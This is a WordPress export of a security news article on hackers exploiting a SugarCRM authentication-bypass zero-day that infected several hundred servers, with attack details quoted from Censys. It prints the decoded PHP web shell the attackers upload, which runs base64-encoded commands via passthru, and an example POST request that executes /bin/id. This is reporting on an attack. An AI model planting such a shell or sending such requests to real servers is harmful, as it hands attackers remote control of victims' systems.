{"id":50089,"date":"2023-01-12T14:05:42","date_gmt":"2023-01-12T14:05:42","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/34212\/Hundreds-Of-SugarCRM-Servers-Infected-With-Critical-In-The-Wild-Exploit.html"},"modified":"2023-01-12T14:05:42","modified_gmt":"2023-01-12T14:05:42","slug":"hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/","title":{"rendered":"Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit"},"content":{"rendered":"<figure class=\"intro-image intro-left\"> <img decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/01\/you-have-been-hacked-800x534.jpg\" alt=\"Shot of a person looking at a hacking message on her monitor reading \" you have been hacked><figcaption class=\"caption\"><\/figcaption><\/figure>\n<aside id=\"social-left\" class=\"social-left\" aria-label=\"Read the comments or share this article\"> <a title=\"0 posters participating\" class=\"comment-count icon-comment-bubble-down\" href=\"https:\/\/arstechnica.com\/information-technology\/2023\/01\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/?comments=1\"> <\/p>\n<h4 class=\"comment-count-before\">reader comments<\/h4>\n<p> <span class=\"comment-count-number\">22<\/span> <span class=\"visually-hidden\"> with 0 posters participating<\/span> <\/a> <\/p>\n<div class=\"share-links\">\n<h4>Share this story<\/h4>\n<\/p><\/div>\n<\/aside>\n<p> <!-- cache hit 71:single\/related:3279cd4ad692082e8da6ae9fb0191bdb --><!-- empty --><\/p>\n<p>For the past two weeks, hackers have been exploiting a critical vulnerability in the SugarCRM (customer relationship management) system to infect users with malware that gives them full control of their servers.<\/p>\n<p>The vulnerability began as a zero-day when the <a href=\"https:\/\/seclists.org\/fulldisclosure\/2022\/Dec\/31\">exploit code<\/a> was posted online in late December. The person posting the exploit described it as an authentication bypass with remote code execution, meaning an attacker could use it to run malicious code on vulnerable servers with no credentials required. SugarCRM has since published an <a href=\"https:\/\/sugarclub.sugarcrm.com\/engage\/b\/sugar-news\/posts\/jan-5-2023-security-vulnerability-update\">advisory<\/a> that confirms that description. The exploit post also included various \u201cdorks,\u201d which are simple web searches people can do to locate vulnerable servers on the Internet.<\/p>\n<p>Mark Ellzey, senior security researcher at network monitoring service Censys said in an email that as of January 11, the company had detected 354 SugarCRM servers infected using the zero-day. That\u2019s close to 12 percent of the total 3,059 SugarCRM servers Censys detected. As of last week, infections were highest in the US, with 90, followed by Germany, Australia, and France. In an update on Tuesday, Censys said the number of infections hasn\u2019t ticked up much since the original post.<\/p>\n<aside class=\"ad_wrapper\" aria-label=\"In Content advertisement\"> <span class=\"ad_notice\">Advertisement <\/span> <\/aside>\n<p>SugarCRM\u2019s advisory, published on January 5, made hotfixes available and said it had already been applied to its cloud-based service. It also advised users with instances running outside of SugarCloud or SugarCRM-managed hosting to install the hotfixes. The advisory said that the vulnerability affected Sugar Sell, Serve, Enterprise, Professional, and Ultimate software solutions. It didn\u2019t impact the Sugar Market software.<\/p>\n<p>The authentication bypass, Censys said, works against the <code>\/index.php\/<\/code> directory. \u201cAfter the authentication bypass is successful, a cookie is obtained from the service, and a secondary POST request is sent to the path \u2018\/cache\/images\/sweet.phar\u2019 which uploads a tiny PNG-encoded file containing PHP code that will be executed by the server when another request for the file is made,\u201d company researchers added.<\/p>\n<p>When the binary is analyzed using hexdump software and decoded, the PHP code roughly translates to:<\/p>\n<p><code>\u2329?php<br \/>echo \u201c#####\u201d;<br \/>passthru(base64_decode($_POST[\u201cc\u201d]));<br \/>echo \u201c#####\u201d;<br \/>?\u232a<\/code><\/p>\n<p>\u201cThis is a simple web shell that will execute commands based on the base64-encoded query argument value of \u2018c\u2019 (e.g., \u2018POST \/cache\/images\/sweet.phar?c=\u201dL2Jpbi9pZA==\u201d HTTP\/1.1\u2019, which will execute the command \u201c\/bin\/id\u201d with the same permissions as the user-id running the web service),\u201d the post explained.<\/p>\n<p>A web shell provides a text-based window that attackers can use as an interface for running commands or code of their choice on compromised devices. Ellzey of Censys said the company didn&#8217;t have visibility into precisely what attackers are using the shells for.<\/p>\n<p>Both Censys and SugarCRM advisories provide indicators of compromise that SugarCRM customers can use to determine if they\u2019ve been targeted. Users of vulnerable products should investigate and install hotfixes as soon as possible.<\/p>\n<p> READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/34212\/Hundreds-Of-SugarCRM-Servers-Infected-With-Critical-In-The-Wild-Exploit.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":50090,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[277],"tags":[10102],"class_list":["post-50089","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity-blogs","tag-headlinehackerflawbackdoor"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2023-01-12T14:05:42+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/01\/you-have-been-hacked-800x534.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit\",\"datePublished\":\"2023-01-12T14:05:42+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/\"},\"wordCount\":481,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit.jpg\",\"keywords\":[\"headline,hacker,flaw,backdoor\"],\"articleSection\":[\"CyberSecurity Blogs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/\",\"name\":\"Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit.jpg\",\"datePublished\":\"2023-01-12T14:05:42+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2023\\\/01\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit.jpg\",\"width\":800,\"height\":534},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,hacker,flaw,backdoor\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlinehackerflawbackdoor\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/","og_locale":"en_US","og_type":"article","og_title":"Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2023-01-12T14:05:42+00:00","og_image":[{"url":"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2023\/01\/you-have-been-hacked-800x534.jpg","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit","datePublished":"2023-01-12T14:05:42+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/"},"wordCount":481,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/01\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit.jpg","keywords":["headline,hacker,flaw,backdoor"],"articleSection":["CyberSecurity Blogs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/","url":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/","name":"Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/01\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit.jpg","datePublished":"2023-01-12T14:05:42+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/01\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2023\/01\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit.jpg","width":800,"height":534},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/hundreds-of-sugarcrm-servers-infected-with-critical-in-the-wild-exploit\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,hacker,flaw,backdoor","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlinehackerflawbackdoor\/"},{"@type":"ListItem","position":3,"name":"Hundreds Of SugarCRM Servers Infected With Critical In-The-Wild Exploit"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/50089","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=50089"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/50089\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/50090"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=50089"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=50089"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=50089"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}